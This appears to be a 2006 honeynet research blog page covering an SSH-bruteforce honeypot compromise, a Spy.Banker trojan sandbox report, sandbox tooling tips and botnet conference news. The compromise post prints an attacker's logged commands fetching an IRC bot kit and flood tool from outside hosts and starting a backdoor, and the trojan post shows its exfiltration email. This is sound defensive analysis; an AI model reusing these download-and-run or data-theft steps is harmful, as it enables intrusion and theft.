Honeypot Compromise: SSH Bruteforcing

Monday, October 30. 2006
About one month ago we had another compromise of one of our honeypots. The attacker came from the IP 71.116.213.XXX (static-71-116-213-XXX.lsanca.dsl-w.verizon.net), which is located in California, US (according to MaxMind). Later on he also used an IP located in Romania.

The compromise was not very interesting: the attacker used a tool for SSH bruteforcing and was able to guess the weak password of one user. He then installed an IRC bot and a backdoor on the compromised machine. Please find below the sanitized logging output of Sebek:

12:12:48	w

12:12:50	uname -a

12:12:54	passwd

12:12:43	w

12:12:53	ls

12:12:54	cd /tmp

12:12:55	ls

12:12:57	cd /var/tmp

12:12:57	ls

12:12:08	wget http://www.members.lycos.co.uk/XXX/mech.tar

12:12:15	wget http://free.7host06.com/XXX/linuxteam.tar.gz

12:12:29	wget http://free.7host06.com/XXX/flood

12:12:00	ls

12:12:04	tar zxvf mech.tar

12:12:06	cd mech

12:12:06	ls

12:12:10	pico mech1.users

12:12:12	nano mech1.users

12:12:16	mcedit mech1.users

12:12:19	vi mech1.users

[...]

12:12:07	vi kswap.set

[...]

12:12:28	./inetd
Posted by Thorsten Holz in honeynets at 19:52 | Comments (2) | Trackbacks (0)

New contributor: David Watson

Monday, October 30. 2006
In the future, I will not be the only one who blogs on honeyblog.org. David Watson from the UK Honeynet Project will join me and blog about stories related to honeypots and honeynets.
Posted by Thorsten Holz in administrativa at 17:43 | Comments (0) | Trackbacks (0)

SecurityFocus: "Viruses, Phishing, and Trojans For Profit"

Thursday, October 26. 2006
Kelly Martin from SecurityFocus published a nice article regarding the economic aspects of the underground: "Viruses, Phishing, and Trojans For Profit" is definitely an interesting read with links to many other articles. And I'm now off to start my YouTube :-)
Posted by Thorsten Holz in paper at 12:11 | Comments (0) | Trackbacks (0)

Nepenthes and CWSandbox

Monday, October 23. 2006
It is also possible to use nepenthes together with CWSandbox: just change in the file submit-norman.cpp the line containing the option CURLOPT_URL (line 174) from "http://sandbox.norman.no/live_4.html" to "http://luigi.informatik.uni-mannheim.de/submit.php?action=verify". All files are then sent to CWSandbox and you will receive the reports in your inbox.

The latest SVN version of nepenthes is able to submit binaries to Norman and CWSandbox, just take a look at changeset 674.
Posted by Thorsten Holz in honeynets at 20:30 | Comments (0) | Trackbacks (0)

CWSandbox vs. Spy.Banker

Friday, October 20. 2006
From time to time we also get malware binaries that behave like a Trojan. This is an example of a Spy.Banker (named by ClamAV), which tries to steal confidential financial information from the compromised machines. The malware uses SMTP to send information back to the attacker. The following mail is sent to the attacker and contains information about the compromised machine:

From: "!Mensagem [Cartao]!" 

Subject: FOO [Infectado por fataL]

To: xtinfecs@gmail.com

Date: Thu, 5 Oct 2006 01:15:26 +0200

X-Priority: 1

X-Library: Indy 9.00.10



!============fataL CorP============!

!Maquina?: FOO!

!Vítima LOGADA: !

!IP: 123.456.789.abc!

!Data de Abertura: 05.10.2006 Hora de Abertura: 01:15:24_

!Sistema?: Microsoft Windows XP (version 5.1)!

!Endereço da Placa: 00-AB-CD-EF-GH-00!

!============fataL CorP============!


The sandbox can also extract this kind of information since it parses the winsock communication and tries to extract information about different protocols. In addition to SMTP, CWSandbox is currently also capable of understanding IRC, HTTP, and FTP. The complete report is also available as HTML analysis and XML analysis.

Continue reading "CWSandbox vs. Spy.Banker"

Posted by Thorsten Holz in malware at 10:02 | Comments (0) | Trackbacks (0)

A Multifaceted Approach to Understanding the Botnet Phenomenon

Thursday, October 19. 2006
At the upcoming Internet Measurement Conference 2006, one of the papers deals with botnets. The paper entitled "A Multifaceted Approach to Understanding the Botnet Phenomenon" by Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, and Andreas Terzis from Johns Hopkins University presents results from their botnet studies. The data they have collected are very similar to the ones we have collected at the German Honeynet Project. In fact, they use nepenthes as one of the basic blocks of their system. They then analyze the collected binaries via "graybox testing" (logging of all network-related activity + active IRC testing) - perhaps CWSandbox would yield better results. The resulting botnet information is then used to track the botnet with a drone - a similar approach we had presented in the "Know your Enemy: Tracking Botnets" and our ESORICS'05 papers. They also use DNS cache snooping to learn more about malicious DNS entries.

Abstract:
The academic community has long acknowledged the existence of malicious botnets, however to date, very little is known about the behavior of these distributed computing platforms. To the best of our knowledge, botnet behavior has never been methodically studied, botnet prevalence on the Internet is mostly a mystery, and the botnet life cycle has yet to be modeled. Uncertainty abounds. In this paper, we attempt to clear the fog surrounding botnets by constructing a multifaceted and distributed measurement infrastructure. Throughout a period of more than three months, we used this infrastructure to track 192 unique IRC botnets of size ranging from a few hundred to several thousand infected end-hosts. Our results show that botnets represent a major contributor to unwanted Internet traffic—27% of all malicious connection attempts observed from our distributed darknet can be directly attributed to botnetrelated spreading activity. Furthermore, we discovered evidence of botnet infections in 11% of the 800,000 DNS domains we examined, indicating a high diversity among botnet victims. Taken as a whole, these results not only highlight the prominence of botnets, but also provide deep insights that may facilitate further research to curtail this phenomenon.

Continue reading "A Multifaceted Approach to Understanding the Botnet Phenomenon"

Posted by Thorsten Holz in paper at 13:14 | Comments (0) | Trackbacks (0)

Call for Paper: HotBots '07

Wednesday, October 18. 2006
The Call for Papers for the First Workshop on Hot Topics in Understanding Botnets (HotBots '07) is now available. I am very proud to be one of the members of the program committee and would love to see many submissions to the conference.

HotBots '07 will be co-located with the 4th USENIX Symposium on Networked Systems Design & Implementation (NSDI '07), which will take place April 11–13, 2007 in Cambridge, MA.

Important dates:
  • Paper submissions due: February 26, 2007

  • Notification to authors: March 19, 2007

  • Final papers due: April 2, 2007

The conference will be held at April 10, 2007, in Cambridge, MA.

Overview:
Preliminary research or experience papers are solicited for the First Workshop on Hot Topics in Understanding Botnets (HotBots '07).

HotBots is intended as a forum for lively discussion of innovative ideas, recent progress, or practical experience in understanding all aspects of botnets. Intriguing preliminary results and thought-provoking ideas will be strongly favored. Papers will be selected for their potential to stimulate discussion in the workshop.


HotBots '07 will be a one-day event, Tuesday, April 10, 2007, co-located with the 4th USENIX Symposium on Networked Systems Design & Implementation (NSDI '07) in Cambridge, MA.

Workshop Format
To ensure a productive workshop environment, attendance will be by invitation and/or acceptance of paper submission.

Each author will have 15 minutes to present his or her idea, followed by 15 minutes of discussion with the workshop participants.

Continue reading "Call for Paper: HotBots '07"

Posted by Thorsten Holz in administrativa, paper at 13:03 | Comments (0) | Trackbacks (0)
(Page 1 of 2, totaling 9 entries) » next page